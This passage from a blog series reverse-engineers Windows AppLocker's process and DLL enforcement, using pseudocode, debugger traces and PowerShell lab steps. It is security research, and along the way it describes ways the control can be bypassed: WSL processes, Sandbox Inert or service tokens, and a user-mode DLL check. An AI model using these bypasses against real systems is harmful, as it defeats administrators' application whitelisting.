An interesting observation is that the process notification callback is NOT called when the process object is created. It's actually called when the first thread is inserted into the process. The callback is made in the context of the thread creating the new thread, which is usually the thread creating the process, but it doesn't have to be. If you look in the PspInsertThread function in the kernel you'll find code which looks like the following:

if (++Process->ActiveThreads == 1)
  CurrentFlags |= FLAG_FIRST_THREAD;
// ...
if (CurrentFlags & FLAG_FIRST_THREAD) {
  if (!Process->Flags3.Minimal || Process->PicoContext)
    PspCallProcessNotifyRoutines(Process);
}

This code first increments the active thread count for the process. If the current count is 1 then a flag is set for use later in the function. Further on the call is made to PspCallProcessNotifyRoutines to invoke the registered callbacks, which is where the APPID callback will be invoked.

The fact the callback seems to be called at process creation time is due to most processes being created using NtCreateUserProcess which does both the process and the initial thread creation as one operation. However you could call NtCreateProcessEx to create a new process and that will succeed; it's just that, in theory, you could never insert a thread into it without triggering the notification. Whether there's a race condition here, where you could get ActiveThreads to never be 1, I wouldn't like to say; almost certainly there's a process lock which would prevent it.

The behavior of blocking process creation after the process has been created is the key difference between WDAC and AL. WDAC prevents the creation of any executable code which doesn't meet the defined policy, therefore if you try and create a process with an executable file which doesn't match the policy it'll fail very early in process creation. However AL will allow you to create a process, doing many of the initialization tasks, and only once a thread is inserted into the process will the rug be pulled away.

The use of the process notification callback does have one current weakness, it doesn't work on Windows Subsystem for Linux processes. And when I say it doesn't work, I mean the APPID callback never gets invoked; as process creation is only blocked from within the callback this means any WSL process will run unmolested.

It isn't anything to do with the checks for Minimal/PicoContext in the code above (or seemingly due to image formats as Alex Ionescu mentioned in his talk on WSL, although that might be why AL doesn't even try), but it's due to the way the APPID driver has enabled its notification callback. Specifically APPID calls the PsSetCreateProcessNotifyRoutineEx method, however this will not generate callbacks for WSL processes. Instead APPID needs to use PsSetCreateProcessNotifyRoutineEx2 to get callbacks for WSL processes. While it's probably not worth MS implementing actual AL support for WSL processes I'm surprised they don't give an option to block them outright rather than just allowing anything to run.

Why Does AppLocker Decide to Block a Process?

We now know how process creation is blocked, but we don't know why AL decides a process should be blocked. Of course we have our configured rules which must be enforced somehow. Each rule consists of three parts:
  1. Whether the rule allows the process to be created or whether it denies creation.
  2. The User or Group the rule applies to.
  3. The property that the rule checks for, this could be an executable path, the hash of the executable file or publisher certificate and version information. A simple path example is "%WINDIR%\*" which allows any executable to run as long as it's located under the Windows Directory.
Let's dig into the APPID process notification callback, AiProcessNotifyRoutine, to find out what is actually happening, the simplified code is below:

void AiProcessNotifyRoutine(PEPROCESS Process, 
                            HANDLE ProcessId, 
                            PPS_CREATE_NOTIFY_INFO CreateInfo) {
  PUNICODE_STRING ImageFileName;
  if (CreateInfo->FileOpenNameAvailable)
    ImageFileName = CreateInfo->ImageFileName;
  else
    SeLocateProcessImageName(Process, 
                             &ImageFileName);

  CreateInfo->CreationStatus = AipCreateProcessNotifyRoutine(
             ProcessId, ImageFileName, 
             CreateInfo->FileObject, 
             Process, CreateInfo);
}

The first thing the callback does is extract the path to the executable image for the process being checked. The PS_CREATE_NOTIFY_INFO structure passed to the callback can contain the image file path if the FileOpenNameAvailable flag is set. However there are situations where this flag is not set (such as in WSL) in which case the code gets the path using SeLocateProcessImageName. We know that having the full image path is important as that's one of the main selection criteria in the AL rule sets.

The next call is to the inner function, AipCreateProcessNotifyRoutine. The returned status code from this function is assigned to CreationStatus, so if this function fails then the process will be terminated. There's a lot going on in this function, I'm going to simplify it as much as I can to get the basic gist of what's going on while glossing over some features such as AppX support and Smart Locker (though they might come back in a later blog post). For now it looks like the following:

NTSTATUS AipCreateProcessNotifyRoutine(
        HANDLE ProcessId, 
        PUNICODE_STRING ImageFileName, 
        PFILE_OBJECT ImageFileObject, 
        PVOID Process, 
        PPS_CREATE_NOTIFY_INFO CreateInfo) {

    POLICY* Policy = SrpGetPolicy();
    if (!Policy)
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    
    HANDLE ProcessToken;
    HANDLE AccessCheckToken;
    
    AiGetTokens(ProcessId, &ProcessToken, &AccessCheckToken);

    if (AiIsTokenSandBoxed(ProcessToken))
        return STATUS_SUCCESS;

    BOOLEAN ServiceToken = SrpIsTokenService(ProcessToken);
    if (SrpServiceBypass(Policy, ServiceToken, 0, TRUE))
        return STATUS_SUCCESS;
    
    HANDLE FileHandle;
    AiOpenImageFile(ImageFileName,
                    ImageFileObject, 
                    &FileHandle);
    AiSetAttributesExe(Policy, FileHandle, 
                       ProcessToken, AccessCheckToken);
    
    NTSTATUS result = SrppAccessCheck(
                      AccessCheckToken,
                      Policy);
    
    if (!NT_SUCCESS(result)) {
        AiLogFileAndStatusEvent(...);
        if (Policy->AuditOnly)
            result = STATUS_SUCCESS;
    }
    
    return result;
}

A lot to unpack here, but we can start at the beginning. The first thing the code does is request the current global policy object. If there's no configured policy then the status code STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is returned. You'll see this status code come up a lot when the process is blocked. Normally even if AL isn't enabled there's still a policy object, it'll just be configured to not block anything. I could imagine if somehow there was no global policy then every process creation would fail, which would not be good.

Next we get into the core of the check, first with a call to the function AiGetTokens. This function opens a handle to the target process' access token based on its PID (why it doesn't just use the Process object from the PS_CREATE_NOTIFY_INFO structure escapes me, but this is probably just legacy code). It also returns a second token handle, the access check token; we'll see how this is important later.

The code then checks two things based on the process token. First it checks the token with AiIsTokenSandBoxed. Unfortunately this is badly named, at least in a modern context, as it doesn't refer to whether the token is a restricted token such as used in web browser sandboxes. What this is actually checking is whether the token has the Sandbox Inert flag set. One way of setting this flag is by calling CreateRestrictedToken passing the SANDBOX_INERT flag. Since Windows 8, or Windows 7 with KB2532445 installed, the "caller must be running as LocalSystem or TrustedInstaller or the system ignores this flag" according to the documentation. The documentation isn't entirely correct on this point, if you go and look at the implementation in NtFilterToken you'll find you can also set the flag if you have the SERVICE SID, which is basically all services regardless of type. The result of this check is if the process token has the Sandbox Inert flag set then a success code is returned and AL is bypassed for this new process.

The second check determines if the token is a service token, first calling SrpIsTokenService to get a true or false value, then calling SrpServiceBypass to determine if the current policy allows service tokens to bypass the policy as well. If SrpServiceBypass returns true then the callback also returns a success code, bypassing AL. It seems it is possible to configure AL to enforce process checks on service processes, however I can't for the life of me find the documentation for this setting. It's probably far too dangerous a setting to allow the average sysadmin to use.

What's considered a service context is very similar to setting the Sandbox Inert flag with CreateRestrictedToken. If you have one of the following groups in the process token it's considered a service:

NT AUTHORITY\SYSTEM
NT AUTHORITY\SERVICE
NT AUTHORITY\RESTRICTED
NT AUTHORITY\WRITE RESTRICTED

The last two groups are only used to allow for services running as restricted or write restricted. Without them access would not be granted in the service check and AL might end up being enforced when it shouldn't be.

With that out of the way, we now get on to the meat of the checking process. First the code opens a handle to the main executable's file object. Access to the file will be needed if rules such as hash or publisher certificate are used. It'll open the file even if those rules aren't being used, just in case. Next a call is made to AiSetAttributesExe which takes the access token handles, the policy and the file handle. This must do something magical, but being the tease I am we'll leave this for now. Finally in this section a call is made to SrppAccessCheck which, as its name suggests, does the access check against the policy to decide whether this process is allowed to be created. Note that only the access check token is passed, not the process token.

The use of an access check, verifying a Security Descriptor against an Access Token makes perfect sense when you think of how rules are structured. The allow and deny rules correspond well to allow or deny ACEs for specific group SIDs. How the rule specification such as path restrictions are enforced is less clear but we'll leave the details of this for next time.

The result of the access check is the status code returned from AipCreateProcessNotifyRoutine which ends up being set to the CreationStatus field in the notification structure which can terminate the process. We can assume that this result will either be a success or an error code such as STATUS_ACCESS_DISABLED_BY_POLICY_OTHER. 

One final step is necessary, logging an event if the access check failed. If the result of the access check is an error, but the policy is currently configured in Audit Only mode, i.e. not enforcing AL process creation then the log entry will be made but the status code is reset back to a success so that the kernel will not terminate the process.

Testing System Behavior

Before we go let's test the assertion that we can create a process which is against the configured policy, as long as there are no threads in it. This is probably not a useful behavior but it's always good to try and verify your assumptions about reverse engineered code.

To do the test we'll need to install my NtObjectManager PowerShell module. We'll use the module more going forward so might as well install it now. To do that follow this procedure on the VM we setup last time:
  1. In an administrator PowerShell console, run the command 'Install-Module NtObjectManager'. Running this command as an admin allows the module to be installed in Program Files which is one of the permitted locations for Everyone in part 1's sample rules.
  2. Set the system execution policy to unrestricted from the same PowerShell window using the command 'Set-ExecutionPolicy -ExecutionPolicy Unrestricted'. This allows unsigned scripts to run for all users.
  3. Log in as the non-admin user, otherwise nothing will be enforced.
  4. Start a PowerShell console and ensure you can load the NtObjectManager module by running 'Import-Module NtObjectManager'. You shouldn't see any errors.
From part 1 you should already have an executable in the Desktop folder which if you run it it'll be blocked by policy (if not copy something else to the desktop, say a copy of NOTEPAD.EXE).

Now run the following three commands in the PowerShell windows. You might need to adjust the executable path as appropriate for the file you copied (and don't forget the \?? prefix).

$path = "\??\C:\Users\$env:USERNAME\Desktop\notepad.exe"
$sect = New-NtSectionImage -Path $path
$p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
Get-NtStatus $p.ExitStatus

After the call to Get-NtStatus it should print that the current exit code for the process is STATUS_PENDING. This is an indication that the process is alive, although at the moment we don't have any code running in it. Now create a new thread in the process using the following:

[NtApiDotNet.NtThread]::Create($p, 0, 0, "Suspended", 4096)
Get-NtStatus $p.ExitStatus

After calling NtThread::Create you should receive a big red exception error and the call to Get-NtStatus should now show that the process returned an error. To make it more clear I've reproduced the example in the following screenshot:

Screenshot of PowerShell showing the process creation and error when a thread is added.

That's all for this post. Of course there's still a few big mysteries to solve, why does AiGetTokens return two token handles, what is AiSetAttributesExe doing and how does SrppAccessCheck verify the policy through an access check? Find out next time.


The Internals of AppLocker - Part 3 - Access Tokens and Access Checking

This is part 3 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 4 here.

In the last part I outlined how process creation is blocked with AL. I crucially left out exactly how the rules are processed to determine if a particular user was allowed to create a process. As it makes more sense to do so, we're going to go in reverse order from how the process was described in the last post. Let's start with talking about the access check implemented by SrppAccessCheck.

Access Checking and Security Descriptors

For all intents and purposes the SrppAccessCheck function is just a wrapper around a specially exported kernel API, SeSrpAccessCheck. While the API has a few unusual features, for this discussion we might as well assume it to be the normal SeAccessCheck API.

A Windows access check takes 4 main parameters:
  • SECURITY_SUBJECT_CONTEXT which identifies the caller's access tokens.
  • A desired access mask.
  • A GENERIC_MAPPING structure which allows the access check to convert generic access to object specific access rights.
  • And most importantly, the Security Descriptor which describes the security of the resource being checked.
Let's look at some code.

NTSTATUS SrpAccessCheckCommon(HANDLE TokenHandle, BYTE* Policy) {
    
    SECURITY_SUBJECT_CONTEXT Subject = {};
    ObReferenceObjectByHandle(TokenHandle, &Subject.PrimaryToken);
    
    DWORD SecurityOffset = *((DWORD*)Policy + 4);
    PSECURITY_DESCRIPTOR SD = Policy + SecurityOffset;
    
    NTSTATUS AccessStatus;
    if (!SeSrpAccessCheck(&Subject, FILE_EXECUTE,
                          &FileGenericMapping, 
                          SD, &AccessStatus) &&
        AccessStatus == STATUS_ACCESS_DENIED) {
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    }
    
    return AccessStatus;
}

The code isn't very complex, first it builds a SECURITY_SUBJECT_CONTEXT structure manually from the access token passed in as a handle. It uses a policy pointer passed in to find the security descriptor it wants to use for the check. Finally a call is made to SeSrpAccessCheck requesting file execute access. If the check fails with an access denied error it gets converted to the AL specific policy error, otherwise any other success or failure is returned.

The only thing we don't really know in this process is what the Policy value is and therefore what the security descriptor is. We could trace through the code to find how the Policy value is set, but sometimes it's just easier to breakpoint on the function of interest in a kernel debugger and dump the pointed at memory. Taking the debugging approach shows the following:

WinDBG window showing the hex output of the policy pointer which shows the on-disk policy.

Well, what do we have here? We've seen those first 4 characters before, it's the magic signature of the on-disk policy files from part 1. SeSrpAccessCheck is extracting a value from offset 16, which is used as an offset into the same buffer to get the security descriptor. Maybe the policy files already contain the security descriptor we seek? Writing some quick PowerShell I ran it on the Exe.AppLocker policy file to see the result:

PowerShell console showing the security output by the script from Exe.Applocker policy file.

Success, the security descriptor is already compiled into the policy file! The following script defines two functions, Get-AppLockerSecurityDescriptor and Format-AppLockerSecurityDescriptor. Both take a policy file as input and return either a security descriptor object or a formatted representation:
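A rough sketch of what those functions could look like is below. It assumes a recent NtObjectManager (for the SecurityDescriptor class and Format-NtSecurityDescriptor) and simply mirrors the offset-16 lookup we saw SeSrpAccessCheck perform, so treat it as illustrative rather than a reference parser:

function Get-AppLockerSecurityDescriptor {
    param([Parameter(Mandatory)][string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    # The DWORD at offset 16 is the offset to the self-relative security descriptor.
    $offset = [System.BitConverter]::ToInt32($bytes, 16)
    [byte[]]$sd_bytes = $bytes[$offset..($bytes.Length - 1)]
    [NtApiDotNet.SecurityDescriptor]::new($sd_bytes)
}

function Format-AppLockerSecurityDescriptor {
    param([Parameter(Mandatory)][string]$Path)
    Get-AppLockerSecurityDescriptor $Path | Format-NtSecurityDescriptor -Summary
}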

If we run Format-AppLockerSecurityDescriptor on the Exe.Applocker file we get the following output for the DACL (trimmed for brevity):

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

We can see we have two ACEs which are for the Everyone group and one for the Administrators group. This matches up with the default configuration we setup in part 1. The last two entries are just there to ensure this access check works correctly when run from an App Container.

The most interesting part is the Condition field. This is a rarely used (at least for consumer versions of the OS) feature of security access checking in the kernel which allows a conditional expression to be evaluated to determine if an ACE is enabled or not. In this case we're seeing the SDDL format (documentation) but under the hood it's actually a binary structure. If we assume that the '*' acts as a globbing character then again this matches our rules, which let's remember:
  • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
  • Allow Administrators group to run any executable from anywhere.
This is how AL's rules are enforced. When you configure a rule you specify a group, which is added as the SID in an ACE in the policy file's Security Descriptor. The ACE type is set to either Allow or Deny and then a condition is constructed which enforces the rule, whether it be a path, a file hash or a publisher.
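As a quick sanity check you can also roughly replay that access check from user mode. This is only an approximation of what the kernel does (it goes via SeSrpAccessCheck rather than a plain access check), but the conditional ACEs are evaluated against the same APPID:// security attributes which, as we'll see shortly, are already present on your process token. It reuses the Get-AppLockerSecurityDescriptor sketch from above:

# What access would the current token be granted against the EXE policy's security descriptor?
$sd = Get-AppLockerSecurityDescriptor "$env:WINDIR\System32\AppLocker\Exe.Applocker"
Get-NtGrantedAccess -SecurityDescriptor $sd -Type (Get-NtType File)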

In fact let's add policy entries for a hash and publisher and see what condition is set for them. Download a new policy file from this link and run the Set-AppLockerPolicy command in an admin PowerShell console. Then re-run Format-ApplockerSecurityDescriptor:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: (Exists APPID://SHA256HASH) && (APPID://SHA256HASH Any_of {#5bf6ccc91dd715e18d6769af97dd3ad6a15d2b70326e834474d952753118c670})

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Flags : None
 - Condition: (Exists APPID://FQBN) && (APPID://FQBN >= {"O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\*", 0})

We can now see the two new conditional ACEs, for a SHA256 hash and the publisher subject name. Basically rinse and repeat: as more rules and conditions are added to the policy they'll be added to the security descriptor as the appropriate ACEs. Note that the ordering of the rules is very important, for example Deny ACEs will always go first. I assume the policy file generation code correctly handles the security descriptor generation, but you can now audit it to make sure.

While we now understand how the rules are enforced, where do the values for the conditions, such as APPID://PATH, come from? If you read the (poor) documentation about conditional ACEs you'll find these values are Security Attributes. The attributes can be either globally defined or assigned to an access token. Each attribute has a name, then a list of one or more values which can be strings, integers, binary blobs etc. This is what AL is using to store the data in the access check token.

Let's go back a step and see what's going on with AiSetAttributesExe to see how these security attributes are generated.

Setting Token Attributes

The AiSetAttributesExe function takes 4 parameters:
  • A handle to the executable file.
  • Pointer to the current policy.
  • Handle to the primary token of the new process.
  • Handle to the token used for the access check.
The code doesn't look very complex, initially:

NTSTATUS AiSetAttributesExe(
            PVOID Policy, 
            HANDLE FileHandle, 
            HANDLE ProcessToken, 
            HANDLE AccessCheckToken) {
  
    PSECURITY_ATTRIBUTES SecAttr;
    AiGetFileAttributes(Policy, FileHandle, &SecAttr);
    NTSTATUS status = AiSetTokenAttributes(ProcessToken, SecAttr);
    if (NT_SUCCESS(status) && ProcessToken != AccessCheckToken)
        status = AiSetTokenAttributes(AccessCheckToken, SecAttr);
    return status;
}

All the code does is call AiGetFileAttributes, which fills in a SECURITY_ATTRIBUTES structure, and then calls AiSetTokenAttributes to set them on the ProcessToken and the AccessCheckToken (if different). AiSetTokenAttributes is pretty much a simple wrapper around the exported (and undocumented) kernel API SeSetSecurityAttributesToken which takes the generated list of security attributes and adds them to the access token for later use in the access check.

The first thing AiGetFileAttributes does is query the file handle for its full path, however this is the native path and takes the form \Device\Volume\Path\To\File. A path of this form is pretty much useless if you wanted to generate a single policy to deploy across an enterprise, such as through Group Policy. Therefore the code converts it back to a Win32 style path such as c:\Path\To\File. Even then there's no guarantee that the OS drive is C:, and what about wanting to have executables on USB keys or other removable drives where the letter could change?

To give the widest coverage the driver also maintains a fixed list of "Macros" which look like Environment variable expansions. These are used to replace the OS drive components as well as define placeholders for removable media. We already saw them in use in the dump of the security descriptor with string components like "%WINDIR%". You can find a list of the macros here, but I'll reproduce them here:
  • %WINDIR% - Windows Folder.
  • %SYSTEM32% - Both System32 and SysWOW64 (on x64).
  • %PROGRAMFILES% - Both Program Files and Program Files (x86).
  • %OSDRIVE% - The OS install drive.
  • %REMOVABLE% - Removable drive, such as a CD or DVD.
  • %HOT% - Hot-pluggable devices such as USB keys.
Note that SYSTEM32 and PROGRAMFILES will map to either 32 or 64 bit directories when running on a 64 bit system (and presumably also ARM directories on ARM builds of Windows?). If you want to pick a specific directory you'll have to configure the rules to not use the macros.

To hedge its bets AL puts every possible path configuration, native path, Win32 path and all possible macroed paths as string values in the APPID://PATH security attribute.

AiGetFileAttributes continues, gathering the publisher information for the file. On Windows 10 the signature and certificate checking is done in multiple ways, first checking the kernel Code Integrity module (CI), then doing some internal work and finally falling back to calling over RPC to the running APPIDSVC. The information, along with the version number of the binary is put into the APPID://FQBN attribute, which stands for Fully Qualified Binary Name.

The final step is generating the file hash, which is stored in a binary blob attribute. AL supports three hash algorithms with the following attribute names:
  • APPID://SHA256HASH - Authenticode SHA256.
  • APPID://SHA1HASH - Authenticode SHA1
  • APPID://SHA256FLATHASH - SHA256 over entire file.
As the attributes are applied to both tokens we should be able to see them on the primary token of a normal user process. By running the following PowerShell command we can see the added security attributes on the current process token.

PS> $(Get-NtToken).SecurityAttributes | ? Name -Match APPID

Name       : APPID://PATH
ValueType  : String
Flags      : NonInheritable, CaseSensitive
Values     : {
   %SYSTEM32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,
   %WINDIR%\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,  
    ...}

Name       : APPID://SHA256HASH
ValueType  : OctetString
Flags      : NonInheritable
Values     : {133 66 87 106 ... 85 24 67}

Name       : APPID://FQBN
ValueType  : Fqbn
Flags      : NonInheritable, CaseSensitive
Values     : {Version 10.0.18362.1 - O=MICROSOFT CORPORATION, ... }


Note that the APPID://PATH attribute is always added, however APPID://FQBN and APPID://*HASH are only generated and added if there are rules which rely on them.

The Mystery of the Twin Tokens

We've come to the final stage, we now know how the security attributes are generated and applied to the two access tokens. The question now is why is there two tokens, the process token and one just for access checking?

Everything happens inside AiGetTokens, which is shown in a simplified form below:


NTSTATUS AiGetTokens(HANDLE ProcessId,
                     PHANDLE ProcessToken,
                     PHANDLE AccessCheckToken)
{
  AiOpenTokenByProcessId(ProcessId, &TokenHandle);

  NTSTATUS status = STATUS_SUCCESS;
  *ProcessToken = TokenHandle;
  if (!AccessCheckToken)
    return STATUS_SUCCESS;

  BOOL IsRestricted;
  status = ZwQueryInformationToken(TokenHandle, TokenIsRestricted, &IsRestricted);
  DWORD ElevationType;
  status = ZwQueryInformationToken(TokenHandle, TokenElevationType, &ElevationType);

  HANDLE NewToken = NULL;
  if (ElevationType != TokenElevationTypeFull)
      status = ZwQueryInformationToken(TokenHandle, TokenLinkedToken, &NewToken);

  if (!IsRestricted
    || NT_SUCCESS(status)
    || (status = SeGetLogonSessionToken(TokenHandle, 0, &NewToken), NT_SUCCESS(status))
    || status == STATUS_NO_TOKEN) {
    if (NewToken)
      *AccessCheckToken = NewToken;
    else
      *AccessCheckToken = TokenHandle;
  }

  return status;
}

Let's summarize what's going on. First, the easy one: the ProcessToken handle is just the process token opened from the process, based on its PID. If the AccessCheckToken is not specified then the function ends here. Otherwise the AccessCheckToken is set to one of three values:
  1. If the token is a non-elevated (UAC) token then use the full elevated token.
  2. If the token is 'restricted' and not a UAC token then use the logon session token.
  3. Otherwise use the primary token of the new process.
We can now understand why a non-elevated UAC admin has Administrator rules applied to them. If you're running as the non-elevated user token then case 1 kicks in and sets the AccessCheckToken to the full administrator token. Now any rule checks which specify the Administrators group will pass.

Case 2 is also interesting, a "restricted" token in this case is one which has been passed through the CreateRestrictedToken API and has restricted SIDs attached. This is used by various sandboxes especially Chromium's (and by extension anyone who uses it such as Firefox). Case 2 ensures that if the process token is restricted and therefore might not pass the access check, say the Everyone group is disabled, then the access check is done instead against the logon session's token, which is the master token from which all others are derived in a logon session.

If nothing else matches then case 3 kicks in and just assigns the primary token to the AccessCheckToken. There are edge cases in these rules. For example you can use CreateRestrictedToken to create a new access token with disabled groups, but which doesn't have restricted SIDs. This results in case 2 not being applied and so the access check is done against the limited token which could very easily fail to validate, causing the process to be terminated.

There's also a more subtle edge case here if you look back at the code. If you create a restricted token of a UAC admin token then process creation typically fails during the policy check. When the UAC token is a full admin token the second call to ZwQueryInformationToken will not be made which results in NewToken being NULL. However in the final check, IsRestricted is TRUE so the second condition is checked, as status is STATUS_SUCCESS (from the first call to ZwQueryInformationToken) this passes and we enter the if block without ever calling SeGetLogonSessionToken. As NewToken is still NULL AccessCheckToken is set to the primary process token which is the restricted token which will cause the subsequent access check to fail. This is actually a long standing bug in Chromium, it can't be run as UAC admin if AppLocker is enforced.

That's the end of how AL does process enforcement. Hopefully it's been helpful. Next time I'll dig into how DLL enforcement works.

Locking Resources to Specific Processes

Before we go, here's a silly trick which might now be obvious. Ever wanted to restrict access to resources, such as files, to specific processes? With the AL applied security attributes now you can. All you need to do is apply the same conditional ACE syntax to your file and the kernel will do the enforcement for you. For example create the text file C:\TEMP\ABC.TXT, now to only allow notepad to open it do the following in PowerShell:

Set-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT `
     -SecurityDescriptor 'D:(XA;;GA;;;WD;(APPID://PATH Contains "%SYSTEM32%\NOTEPAD.EXE"))' `
     -SecurityInformation Dacl

Make sure that the path is in all upper case. You should now find that while PowerShell (or any other application) can't open the text file you can open and modify it just fine in notepad. Of course this won't work across network boundaries and is pretty easy to get around, but that's not my problem ;-)
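If you want to double check what was actually written you can read the descriptor straight back, assuming a recent NtObjectManager:

# Read back the DACL to confirm the conditional ACE was applied as expected.
Get-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT -SecurityInformation Dacl | Format-NtSecurityDescriptor -Summary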



The Internals of AppLocker - Part 4 - Blocking DLL Loading

This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

Warning text on DLL rules stating that enabling them could affect system performance.

It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

We know from the part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly if you look at the names in APPID you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code to a device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

// 0x225804
#define IOCTL_SRP_VERIFY_DLL CTL_CODE(FILE_DEVICE_UNKNOWN, 1537, \
            METHOD_BUFFERED, FILE_READ_DATA)

struct SRP_VERIFY_DLL_INPUT {
    ULONGLONG FileHandle;
    USHORT FileNameLength;
    WCHAR FileName[ANYSIZE_ARRAY];
};

struct SRP_VERIFY_DLL_OUTPUT {
    NTSTATUS VerifyStatus;
};

Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation I described in detail in part 2 and 3:
  1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
  2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
  3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
  4. Security attributes set on token using AiSetTokenAttributes.
  5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
It makes sense that the security attributes have to be recreated as the access check needs to know the information about the DLL being loaded, not the original executable. Even though a file name is passed in the input structure, as far as I can tell it's only used for logging purposes.

There is one big difference in step 1 where the token is captured over the one I documented in part 3. In process blocking if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or Microsoft just don't care?

Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

Breakpoint 1 hit
appid!SrpVerifyDll:
fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
0: kd> kc
 # Call Site
00 appid!SrpVerifyDll
01 appid!AipDeviceIoControlDispatch
02 nt!IofCallDriver
03 nt!IopSynchronousServiceTail
04 nt!IopXxxControlFile
05 nt!NtDeviceIoControlFile
06 nt!KiSystemServiceCopyEnd
07 ntdll!NtDeviceIoControlFile
08 ADVAPI32!SaferpIsDllAllowed
09 ADVAPI32!SaferiIsDllAllowed
0a ntdll!LdrpMapDllNtFileName
0b ntdll!LdrpMapDllFullPath
0c ntdll!LdrpProcessWork
0d ntdll!LdrpLoadDllInternal
0e ntdll!LdrpLoadDll

Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32, has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTDLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

NTSTATUS status;

if ((LoadInfo->LoadFlags & 0x100) == 0 
        && LdrpAdvapi32DllHandle) {
  status = LdrpSaferIsDllAllowedRoutine(
        LoadInfo->FileHandle, LoadInfo->FileName);
}

The call to SaferiIsDllAllowed is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, most importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer, 'XOR' encrypted, in LdrpSaferIsDllAllowedRoutine.
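
If you want to check whether that key is populated on a particular machine, and therefore whether NTDLL will wire up the callback at process start, a simple registry query is enough:

PS> Get-ChildItem HKLM:\SYSTEM\CurrentControlSet\Control\Srp\GP\DLL | Select-Object PSChildName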

Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

